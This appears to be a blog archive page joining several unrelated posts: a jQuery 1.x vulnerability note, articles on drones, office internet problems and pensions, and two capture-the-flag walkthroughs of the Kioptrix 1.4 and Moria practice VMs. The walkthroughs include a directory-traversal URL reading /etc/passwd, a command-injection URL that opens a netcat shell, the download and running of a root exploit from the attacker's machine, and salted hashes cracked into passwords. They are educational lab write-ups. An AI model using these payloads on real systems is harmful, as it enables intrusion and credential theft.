A jQuery 1.x vulnerability exists and no fix is planned

I haven’t seen much talk about this issue around the Internet, so I thought I’d present what I’ve learned for others to be aware of. It mainly has to do with the fact that jQuery 1.x (and 2.x, for that matter) were replaced by 3.x, yet they are still thriving in many, many projects, applications, and websites to this day.

While doing a security review of some code the other day, a retirejs scan informed me that jQuery 1.x contained a Medium vulnerability regarding cross-domain requests in ajax. According to Snyk:

“Affected versions of the package are vulnerable to Cross-site Scripting (XSS) attacks when a cross-domain ajax request is performed without the dataType option causing text/javascript responses to be executed.

Remediation: Upgrade jquery to version 3.0.0 or higher.”

“Upgrading to 3.0.0 or higher seems pretty drastic,” I thought to myself. Well, according to a comment I found on jQuery’s GitHub page, this is actually their stance, and they don’t plan on patching 1.x because it is a ‘breaking change’:

https://github.com/jquery/jquery/issues/2432#issuecomment-290983196

So it would behoove you to upgrade to jQuery 3 if you don’t want to be susceptible to this vulnerability. The magnitude of that may seem rather staggering if you consider all the projects across just about everything (WordPress plugins, Drupal modules, etc etc) that bundle the 1.x version of jQuery, and haven’t updated it in years.

While the vulnerability may not be relevant if you are not making cross-domain ajax calls, this is but one risk that has come to light for which there will be no fix. And it’s not exactly reasonable to assume that developers know they need to avoid that if they intend to use jQuery 1.x.

The longer jQuery 1.x sits in your project, the higher a risk it becomes.

As the impending OWASP Top-10 for 2017 says, “Applications and APIs using components with known
vulnerabilities may undermine application defenses and enable various attacks and impacts.”

Long story short: Keep your bundled libraries up to date!

6 Ways Drones are Set to Change the World

Unless you’ve been living in a nuclear bunker for the past few years, you can’t fail to have noticed the hype surrounding drones. From delivering your packages from Amazon to delivering takeaways to hungry students, they have been hailed as a coming revolution in the way we all live our lives. But what’s the truth about these unmanned aircraft we’ve been hearing so much about?

Well, the truth is that although drones haven’t replaced the UPS man yet, there is a good chance they will do that, and many other things, in the future. Here are just some of the ways that drones are set to change the world:

Package Delivery

In an Interview on ’60 Minutes’ Amazon’s CEO, Jeff Bezos noted that more than 85 percent of all orders from the site weigh in at fewer than 5 pounds. This is notable simply because that makes them light enough to be carried by drones. Since then, Amazon have started testing drones that can deliver products within 30 minutes of an order being made. Other companies, including Google, have also started trials into their own drone services

Although testing has been initiated, there are still a number of issues, which will need to be ironed out, not least the impact on other air traffic and the possibility of theft, before drones are likely to be rolled out across the country. It will happen one day though, and we’ll be able to get our packages in record time when it does!

Warehouse Use

Another company that has started to look to drones for solutions to its most common problems is Walmart, who have started looking into ways that drones can be used within their warehouses. The company hopes that using drones to catalog its inventory and move stock around will cut down on costs. Of course, this could also mean fewer warehouse jobs in the future.

Farming

Another area where software product development is being used to make the most out of drones is in the agriculture industry. Farmers are starting to use drones to monitor the health of their crops and identify areas where additional fertilizer, water or pesticides may be useful.  Some drones have even been modified so that they can spray crops from above. This cuts down significantly on the amount of work they have to do to keep their crops healthy, and can only be seen as a positive by anyone in the industry, so it is only a matter of time before we see drones used in farming as a matter of course.

Delivering Humanitarian Aid

As many as 2.1 billion people on Earth are unable to access the most basic of medicines they need to stay healthy, and this is primarily because they live in areas that are difficult to access. In order to change this situation and ensure that medicine is available to more people who need it Zipline – a drone manufacturer based in California – made a deal with the Rwandan government to deliver medication via drone which can travel within a 50-mile radius. Medication can be requested by Health Centers in the area via text message, making the whole process as simple as possible, and ensuring that more lives are saved as a result.

Law Enforcement

Back in 2015, the Michigan State Police were given the approval to use a quadcopter in order to respond to incidents, access suspicious situations and even conduct search and rescue operations in the area. This significantly cut down on the manpower needed to conduct these kinds of operations, so it is highly-likely that other police forces across the globe will get on board with the drone revolution in the near future.

Insurance Claims

Another area where drones are likely to be used more and more in the future is in the insurance industry. If, for example, a building is damaged in a storm or because there has been a fire, a drone can be sent to take pictures of the damage, which can be used by insurance companies to validate and calculate claims, which should mean that claims can be handled much more quickly than they are now when an adjuster has to be sent out to investigate each and every claim.

As you can see, drones are here to stay, and they are able to do a lot of the boring and complicated tasks that humans currently have to do for themselves. Although this will undoubtedly benefit many people, and it will certainly benefit a lot of businesses, there is likely to be some fallout as some jobs become obsolete, too. So we will just have to sit back and see how the drone revolution pans out.

Kioptrix 1.4 (VM 5) Walkthrough

This evening I am finally catching up on write-ups of the Virtual Machine penetration testing (and subsequent pwnage) I have been working on. This is the second one I finished up and got ready to share, in case anyone finds it useful. The Kioptrix series of VMs are available on vulnhub.com, and you can download them to practice your hacking skills with at any time, for free.

Having already conquered the preceding 4 Kioptrix VMs, I started this one a while ago, but I hadn’t circled back to finish it. I figured it was time to complete the last of the Kioptrix boot2root challenges. This one was difficult!

Enumeration

netdiscover turned up 192.168.0.196 as the IP for this target VM.

#> nmap -v -sS -A -T4 192.168.0.196
22/tcp closed ssh
80/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
| http-methods:
|_ Supported Methods: GET
8080/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
|_http-title: 403 Forbidden

On port 80, just a default Apache “It works!” message, and 8080 is a forbidden 403 message. Worth noting that for later.

nikto

nikto -host 192.168.0.196
– Nikto v2.1.6
—————————————————————————
+ Target IP: 192.168.0.196
+ Target Hostname: 192.168.0.196
+ Target Port: 80
+ Start Time: 2017-02-14 21:01:40 (GMT-5)
—————————————————————————
+ Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8
+ Server leaks inodes via ETags, header found with file /, inode: 67014, size: 152, mtime: Sat Mar 29 13:22:52 2014
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ mod_ssl/2.2.21 appears to be outdated (current is at least 2.8.31) (may depend on server version)
+ PHP/5.3.8 appears to be outdated (current is at least 5.6.9). PHP 5.5.25 and 5.4.41 are also current.
+ OpenSSL/0.9.8q a ppears to be outdated (current is at least 1.0.1j). OpenSSL 1.0.0o and 0.9.8zc are also current.
+ Apache/2.2.21 appears to be outdated (current is at least Apache/2.4.12). Apache 2.0.65 (final release) and 2.2.29 are also current.
+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8 – mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.
+ 8345 requests: 0 error(s) and 11 item(s) reported on remote host
+ End Time: 2017-02-14 21:02:52 (GMT-5) (72 seconds)
—————————————————————————
+ 1 host(s) tested

Summary of Interesting finds:
OpenSSL exploit
Older Apache
Older PHP

Finding Directories

dirb

Turned up index.html (nothing new) and cgi-bin. Blah.

dirsearch

Tried various wordlists. Nothing turned up with this either.

mod_ssl vulnerability

Nikto did mention this vulnerability, so I took a deeper dive:

+ mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8 – mod_ssl 2.8.7 and lower are vulnerable to a remote buffer overflow which may allow a remote shell. http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2002-0082, OSVDB-756.

This is that same old OpenFuck vuln I ran into in Kioptrix 1.1. I was unable to get it to compile then, so I didn’t feel like wasting time on it now.

Source Code to a PHP app

Failing to ever look at the source code of the Apache “It Works!” default page, I kicked myself when I realized I hadn’t done that. In the source code was a handy comment:

<!–
<META HTTP-EQUIV=”refresh” CONTENT=”5;URL=pChart2.1.3/index.php”>
–>

Appending pChart2.1.3/index.php to the URL got me to some crappy PHP app:

http://192.168.0.196/pChart2.1.3/examples/index.php

The app looks like it would have a load of issues based on what it does and how it does it. An Exploit DB search reveals it does:

https://www.exploit-db.com/exploits/31173/

Directory Traversal sounds useful!

Using the exploit at Exploit DB, I found /etc/passwd:

http://192.168.0.196/pChart2.1.3/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd

# $FreeBSD: release/9.0.0/etc/master.passwd 218047 2011-01-28 22:29:38Z pjd $
#
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
operator:*:2:5:System &:/:/usr/sbin/nologin
bin:*:3:7:Binaries Commands and Source:/:/usr/sbin/nologin
tty:*:4:65533:Tty Sandbox:/:/usr/sbin/nologin
kmem:*:5:65533:KMem Sandbox:/:/usr/sbin/nologin
games:*:7:13:Games pseudo-user:/usr/games:/usr/sbin/nologin
news:*:8:8:News Subsystem:/:/usr/sbin/nologin
man:*:9:9:Mister Man Pages:/usr/share/man:/usr/sbin/nologin
sshd:*:22:22:Secure Shell Daemon:/var/empty:/usr/sbin/nologin
smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/usr/sbin/nologin
mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/usr/sbin/nologin
bind:*:53:53:Bind Sandbox:/:/usr/sbin/nologin
proxy:*:62:62:Packet Filter pseudo-user:/nonexistent:/usr/sbin/nologin
_pflogd:*:64:64:pflogd privsep user:/var/empty:/usr/sbin/nologin
_dhcp:*:65:65:dhcp programs:/var/empty:/usr/sbin/nologin
uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/local/libexec/uucp/uucico
pop:*:68:6:Post Office Owner:/nonexistent:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
hast:*:845:845:HAST unprivileged user:/var/empty:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
mysql:*:88:88:MySQL Daemon:/var/db/mysql:/usr/sbin/nologin
ossec:*:1001:1001:User &:/usr/local/ossec-hids:/sbin/nologin
ossecm:*:1002:1001:User &:/usr/local/ossec-hids:/sbin/nologin
ossecr:*:1003:1001:User &:/usr/local/ossec-hids:/sbin/nologin

Poking Around

I was unable to turn up anything useful in any of the /etc directory files I was able to look at. I started looking up the locations of things in freebsd, since they were likely different than most Linux distros I am used to.

That said, I thought that the Apache config file would be a good place to start, as it might illumincate additional info such as usernames, or locations of password files. I might also find out if anything else is hidden on the website.

According to this page https://www.freebsd.org/doc/handbook/network-apache.html the httpd.conf file is here:
/usr/local/etc/apache2x/httpd.conf

I had to figure out that the x in that path should be a 2, since this server is running Apache 2.2

So that worked:

So what was relevant in the httpd.conf file?

Listen 80
Listen 8080

I already knew 80 was listening, and 8080 was reported as open but returning a 403 when trying to visit it in a web browser.

DocumentRoot “/usr/local/www/apache22/data”

That’s where files are served from in Apache on freebsd, apparently.

This VirtualHost section looked interesting, as it explained the 403 errors I was getting when visiting the :8080 port
:

SetEnvIf User-Agent ^Mozilla/4.0 Mozilla4_browser

<VirtualHost *:8080>
DocumentRoot /usr/local/www/apache22/data2

<Directory “/usr/local/www/apache22/data2”>
Options Indexes FollowSymLinks
AllowOverride All
Order allow,deny
Allow from env=Mozilla4_browser
</Directory>

So the :8080 virtual host is guarded by requiring a specific browser User-Agent string. Time to install User Agent Switcher add-on for Firefox. I prefer the one by Chris Pederick.

A Mozilla 4.0 browser is actually Internet Explorer 6, so I set my User Agent to be IE6, then I was able to get to the :8080 page:

Clicking that led me to yet another crappy PHP app!

Attacking the PHPTAX app

This app smelled like it was choc-full of fun exploits. A quick Google search revealed exactly that.

https://www.exploit-db.com/exploits/21665/

This will start a netcat reverse shell by injecting the command via the URL:

http://192.168.0.196/phptax/index.php?pfilez=1040d1-pg2.tob;nc%20-l%20-v%20-p%2023235%20-e%20/bin/bash;&pdf=make

Trying to set up a netcat listener using various methods wasn’t working. I tried various ports and different things from the exploit-db entry (the other URL they mentioned), but had no luck.

Was there already an exploit in Metasploit?

That would be a “yes.” I thought doing it by hand would be more noble and educational, but alas, that proved to be untrue. Except that I learned I was down a rabbit hole. Off to metasploit I went…

That worked pretty well, and I found myself with a command shell.

Looks like I was the www user/group. I set out to escalate them privileges. Looking around for quite some time, I didn’t find anything too great. So I started with looking into OS/Kernel vulnerabilities.

uname -a
FreeBSD kioptrix2014 9.0-RELEASE FreeBSD 9.0-RELEASE #0: Tue Jan 3 07:46:30 UTC 2012 root@farrell.cse.buffalo.edu:/usr/obj/usr/src/sys/GENERIC amd64

FreeBSD 9.0 seemed pretty old. A couple of promising leads turned up when looking for exploits:

Privilege Escalation

So I had 2 exploits to work with, just needed a place I could write files. Turns out the original web directory I was in when I got the reverse shell was perfect:

/usr/local/www/apache22/data2/phptax

touch me
cat me

Next, I needed to get the exploit file over to the target machine. I wasn’t sure how to do this, so I Googled it. This helped: https://netsec.ws/?p=292. Or so I thought. I couldn’t get it transferred with netcat and I’m still not sure why.

More Googling led me to ‘fetch’ which is installed on the FreeBSD machine.

So I set up a quick web server to serve up the exploit file from my Kali box using Python. From the directory where the exploit file (26368.c) resides:

python -m SimpleHTTPServer 80

Then from the reverse shell on the target machine, fetch the file:

fetch http://192.168.0.147/26368.c

Compile that sucker:

gcc 26368.c

Then run it:

./a.out

ROOT!

And the flag is in /root/congrats.txt

You should read the congrats.txt file and look into what it says, if you made it this far. There are some opportunities to learn about what you just did in there!

Moria: A Boot2Root VM Walkthrough

Moria is a relatively new boot2root VM created by Abatchy, and is considered an “intermediate to hard” level challenge. I wasn’t sure I was up for it since I’ve only been doing this for a few months, but much to my delight I conquered this VM and learned a lot in the process. This experience will certainly help as I prepare for the OSCP certification.

While Abatchy says, “No LOTR knowledge is required ;),” I found that my LOTR knowledge came in quite handy.

Getting Started

My setup:

  • MacBook running MacOS (Sierra)
  • VMWare Fusion running:
  • Kali Linux (latest)
  • Moria VM

Once the VM was downloaded and running in VMWare, I started through various enumeration techniques that I typically go through when starting to penetration test a box. I’ll omit the irrelevant ones in this write-up.

Enumeration

Netdiscover

This tool revealed the IP of this machine on my network:

192.168.0.131

nmap

I used nmap -v -sS -A -T4 192.168.0.131
and nmap –sS –sV -O 192.168.0.131

PORT STATE SERVICE
21/tcp open ftp vsftpd 2.0.8 or later
22/tcp open ssh OpenSSH 6.6.1 (protocol 2.0)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.4.16)
MAC Address: 00:0C:29:E8:75:4F (VMware)
Device type: general purpose
Running: Linux 3.X|4.X

So HTTP, FTP, and SSH were running. I started by checking out HTTP and visiting http://192.168.0.131 in a web browser. Here’s what I got:

The image of the West Door of Moria is from LOTR. This door was a trick door in the book and movies, and it required some “outside the box” thinking in order to gain entry. I remembered this from the books, and re-familiarized myself with the details via a Google search:

From http://tolkiengateway.net/wiki/Doors_of_Durin:

“On 13 January 3019 the Fellowship of the Ring entered Moria through the Doors,[5] but initially Gandalf could not find out the password to open them. Merry Brandybuck unknowingly gave Gandalf the answer by asking, “What does it mean by speak, friend, and enter?” When Gandalf realized that the correct translation was “Say friend and enter” he sprang up, laughed, and said “Mellon”, which means “friend” in Sindarin, and the Doors opened. Shortly thereafter, the Watcher in the Water attacked the Fellowship and shut the Doors behind them.[1]”

Good info that might come in handy later 😉

dirb

Running dirb led to the discovery of a directory at http://192.168.0.131/w/. It contained a link to /h/, and so on. Traversing down the links led to:

http://192.168.0.131/w/h/i/s/p/e/r/the_abyss/


The page said “Knock knock”
Was this a reference to port knocking? I thought that might be worth checking out later if I could find more info about a sequence.

At this time I was unable to find much more to work with related to the website and HTTP. The usual nikto and other apache/web-related stuff didn’t turn much up. I turned to FTP.

ftp

Trying to connect via FTP turned up some interesting info:

220 Welcome Balrog!

Clearly, the Lord of the Rings theme was running deep. I wondered if the password would be “mellon,” since that was what got the LOTR party into the gates of Moria. I couldn’t get that to work, and I wasn’t sure about a username.

Revisiting the website

Poking around the website some more, I DISCOVERED SOMETHING IMPORTANT!!!
When I browsed to http://192.168.0.131/w/h/i/s/p/e/r/the_abyss/
It gave me something different the next time. I found that a different quote would appear with each page load. I kept refreshing and collected all of the following:

Knock Knock
Is this the end?
Too loud!
Dain:”Is that human deaf? Why is it not listening?”
Nain:”Will the human get the message?”
Is this the end?
“We will die here..”
Ori:”Will anyone hear us?”
Nain:”Will the human get the message?”
Telchar to Thrain:”That human is slow, don’t give up yet”
Maeglin:”The Balrog is not around, hurry!”
Balin: “Be quiet, the Balrog will hear you!”
Oin:”Stop knocking!”
“Eru! Save us!”

A couple of weeks passed at this point, as I went out of town and had other things going on, but it gave me an opportunity to think about Moria and to come back with a fresh perspective.

ssh

Tried a bunch of other things, but finally tried doing SSH to the server and was prompted for a login.
Based on the FTP connection saying “Welcome Balrog!” I assumed that Balrog was a username. I also assumed that Mellon was the password knowing what I know about the LOTR story. Lastly, I realized I probably needed to try various capitalizations.

Using the login combo of Balrog / Mellon I got this:

 

Wrong gate? OK. I went back to try FTP with the Balrog/Mellon auth combo and got in:

Silly me. The username was right there in front of me when I had been trying FTP before. Nothing in the directory I logged into turned up, but I was able to cd .. up to /

I could go many places with basic dir navigation, but much was not allowed. For example, could get into /etc but not look at passwd. I couldn’t find anywhere that I could upload anything, and none of the important system files you’d typically check were allowed to be viewed.

I went to /var/www/html and found a directory that dirb would never have discovered:

Viewing that page in my web browser showed a handy table of what appeared to be hashes:

Hashes

I set off to see what those passkeys could do. They did’t seem to work as-is for SSH or FTP, so I knew they’d need to be operated on somehow.

hash-identifier said they were likely MD5 hashes:

Without a salt I wasn’t sure how I’d use that information.

I tried various things with Hashcat and John the Ripper, but had no luck. I was stumped for a while until I looked under the hood at the source code of that page at http://192.168.0.131/QlVraKW4fbIkXau9zkAPNGzviT3UKntl/

Note: Looking at the HTML source code is something I always forget to do, and it has bitten me more than once!

At the bottom of the source code I found what appeared to be the salts:

 

So I had the salts for those MD5 hashes, and I had what looked like the format for using them:

MD5(MD5(Password).Salt)

Cracking

This next part took me a lot of reading and learning, as I’d never really run into this before in my rather limited experience, and I had only a basic knowledge of Hashcat and John the Ripper. While it took some time, it turned out to be a great opportunity to learn.

Ultimately, based on what I had read in various seedy places of the Internet’s underbelly, I created a file called hashes.txt with these contents, based on the HTML chart found above, and added the salts to each line (after the $) respectively:

Balin:c2d8960157fc8540f6d5d66594e165e0$6MAp84
Oin:727a279d913fba677c490102b135e51e$bQkChe
Ori:8c3c3152a5c64ffb683d78efc3520114$HnqeN4
Maeglin:6ba94d6322f53f30aca4f34960203703$e5ad5s
Fundin:c789ec9fae1cd07adfc02930a39486a1$g9Wxv7
Nain:fec21f5c7dcf8e5e54537cfda92df5fe$HCCsxP$HCCsxP
Dain:6a113db1fd25c5501ec3a5936d817c29$cC5nTr
Thrain:7db5040c351237e8332bfbba757a1019$h8spZR
Telchar:dd272382909a4f51163c77da6356cc6f$tb9AWe

I still needed to figure out the right format for running through John the Ripper though, so more research was needed. I turned to these places:

http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats – not much help here.
https://github.com/piyushcse29/john-the-ripper/blob/master/doc/DYNAMIC – found the solution here.

Based on the chart on the documentation page for DYNAMIC, the format mentioned in the source code would work with this:

dynamic_6 | md5(md5($p).$s)

I next tried that on the hashes.txt file:

root@kali:~/moria# john –format=dynamic_6 hashes.txt
Using default input encoding: UTF-8
Loaded 9 password hashes with 9 different salts (dynamic_6 [md5(md5($p).$s) 128/128 AVX 4×3])
Press ‘q’ or Ctrl-C to abort, almost any other key for status
magic (Telchar)
abcdef (Dain)
spanky (Ori)
fuckoff (Maeglin)
flower (Balin)
rainbow (Oin)
darkness (Thrain)
hunter2 (Fundin)

SUCCESS!

I had a list of passwords for each user. Only one of these worked for logging in via SSH, and that was Ori’s account.

Bash Shell Obtained

Got a Bash shell with Ori’s login via SSH:

-bash-4.2$

-bash-4.2$ ls -al
total 8
drwx—— 3 Ori notBalrog 55 Mar 12 22:57 .
drwxr-x—. 4 root notBalrog 32 Mar 14 00:36 ..
-rw——- 1 Ori notBalrog 1 Mar 14 00:12 .bash_history
-rw-r–r– 1 root root 225 Mar 13 23:53 poem.txt
drwx—— 2 Ori notBalrog 57 Mar 12 22:57 .ssh

Starting in Ori’s home directory, I checked out the .ssh directory to see what might be relevant.

It looked like Ori had logged into localhost before, since it showed up as a known_host. Why would he be doing that unless he needed to log in as someone else? Perhaps as root?

root Obtained – All That is Gold Does Not Glitter

Huh…well that last part was easier than I thought it might be. Thanks to Abatchy for providing this challenge. I learned a lot!

 

Common Business Internet Woes – Tackled

It’s difficult to imagine any business these days running without the use of the Internet. Even businesses you can think of that don’t really seem to have an online presence probably use the Internet for research and buying supplies.

So it seems that businesses should have gotten used to the idea that they need to make sure their Internet problems are minimized. Unfortunately, as many of you have probably experienced for yourself, your average place of business still has a plethora of Internet issues!

If you run a businesses, then it’s vital that you take care of any of these common and infuriating Internet problems. They ruin productivity and employee satisfaction, so take the time to find solutions!

Distractions

The first problem business owners usually think of distracted employees – and there’s no doubt that it’s a problem! Inappropriate web surfing is rife in the modern office for several reasons. Not only is an ethically-questionable use of company time, but it also presents usability problems. If people are watching YouTube videos instead of working, than not only are they, y’know, not working, but they’re also being bandwidth hogs, potentially slowing down the Internet speed for everyone else! Speaking of which…

Slowdown

The most notorious problem of all. Slow office Internet absolutely destroys your productivity potential. And, as anyone who has ever had to deal with slow Internet knows all too well, it’s also incredibly frustrating, making your employees feel more stressed. Making sure bandwidth is being responsibly is one thing, but you may need to look at working with a more reliable ISP if the problem persists. The problem may also be partly an issue of physics. After all, users who are farther away from the Wi-Fi source may find they have to fight against slower Internet than everyone else. If might be worth looking into the best WiFi range extender you can get. This helps you get the full WiFi blast across your office, instead of allowing that power to peter out for people who don’t happen to have their desk next to the router.

Filters and restrictions

One of the ways you can prevent distractions at work is by using web filters and restrictions to prevent employees going on websites that you don’t want them visiting. The problem here is that it prevents you from accessing a lot of useful websites. After all, social media is often required for marketing, customer service, or research purposes. Then you need to consider breaks – why block employees from accessing those websites then? It may actually create more problems than it solves. It also screams “WE DON’T TRUST YOU” to the employees, which hardly helps with morale.

Security problems

Malicious content like viruses, trojans, and worms. Unauthorized access from persons internal and external. A lack of encryption making it easy for outside parties to gain access to information. These are all problems you need to tackle because they’re all problems of which you’re at risk, regardless of how small your business is. Make sure you invest in tight web security measures, and ensure you have strong and clear Internet security policies for your employees to follow.

Pension Mistakes That Are on the Rise Right Now

If you are planning on retiring at some point in the future, you’re going to need to start thinking about your pension and the plan you have in place for it. That means everyone is going to need to think about this at some point, and sooner is usually better than later. However, just because people do pay attention to their pensions, that doesn’t mean that they always get it right. There are a lot of mistakes out there that get made a lot.

Making mistakes related to your pension is risky, and it’s something that you shouldn’t let happen if you can help it. When mistakes get made, your entire future can be put in jeopardy, which is not what you want to happen at all. Unfortunately, as more people learn about the perils that can hit them if they enter retirement without enough money, more mistakes are getting made. The mistakes that are on the rise right now are discussed below. Make sure you don’t make them too.

Big Withdrawals

People who withdraw too much from their pension pots usually end up regretting it later. It might seem like a reasonable thing to do right now. But you might not have that same attitude in a few years time. It’s important to remain sensible and keep thinking about the future because that’s what matters most. Pensions are not about the here and now, or what you want to spend money on next month. They’re about making your financial situation secure and stable for a long time to come. So, keep on top of this and don’t withdraw much money from your pension pot. And if you do, make sure you have a plan in mind for investing it so that the overall amount grows not decreases in the long-term.

Relying on Your Partner to Take Care of Things

Many people simply let their partner take care of their pension situation for them. This is pretty normal, and it can seem like a sensible thing to do. But no relationship is 100% secure. You don’t know what’s going to happen tomorrow, nevermind what might happen a year from now. That’s why it’s always best to take personal responsibility for your pension arrangements. That way, you won’t be left in the lurch trying to work out the situation for yourself later on if you no longer have our partner to do things for you. There is no one better placed to oversee your pension planning arrangements than you. Of course, you can get professional help along the way, but you should retain control.

Assuming You’re Too Young to Start Planning

It’s common for people to feel like they’re too young to start worrying about their pension and their retirement. But when it comes to retirement planning, there is no such thing as too young. You can get started at any time, and there is no need to believe that you have to wait until you’re in your 50s to begin. Yes, when you’re young finding the financial resources to simply get by can be tricky. But it’s still worth trying to find a bit of extra money each month that can be stored away for your retirement. And you should also get involved in your employer’s pension scheme too.

Not Handling Debt Correctly

Debt is a burden at the best of times. But if you still have significant debts hanging over your head when you enter retirement, it just makes your life harder than it ought to be. You don’t have the income to offset those debts and eventually clear them. That’s why it’s much better to pay off your debts as soon as possible, ideally when you’re still in full-time work. That way, you can enter retirement without this worry in your mind. Failing to handle debt properly while you’re in middle age can really punish you when you’re retired. Don’t make the same mistake so many others have in the past.

Not Getting the Right Help and Advice

Going it alone is not always the best thing to do when you’re trying to plan your retirement. Although it can be tempting, it’s often better to get the right advice and professional financial help. This will help you to make the right decisions regarding funds, bonds and stock investments you might have. These days, you have to invest in some way if you want your savings to grow ahead of retirement. Speak to a financial advisor and make sure that you can trust them properly before you commit to anything, though.

Forgetting About Future Healthcare Costs

You have to think about your future needs and how they might be different to how they are right now. For example, most people have more care costs when they get older. Even if it just means making some smalls changes to your house to help improve mobility, these things cost money. You don’t know what your specific needs will be in 10, 20 or 30 years time, so it makes sense to save more to cover these basic extra costs. Don’t assume that you will be able to live on less money on when you enter retirement because the opposite might actually be the case. You should be looking to make retirement as comfortable as possible, and that demands cash.

Failing to Update Your Personal Information

This is one of those small things that can actually have a pretty big impact on your financial situation when you’re in retirement. If you don’t keep your personal information up to date and in good shape, you could face big problems later on. It doesn’t take much to keep your information up to date. So, when you m
ove house, inform any companies that you use to organise your pension. You don’t want to be penalised and have your finances threatened by something as basic and as simple as this. It’s easy to forget, so set yourself a reminder whenever your circumstances change in some way.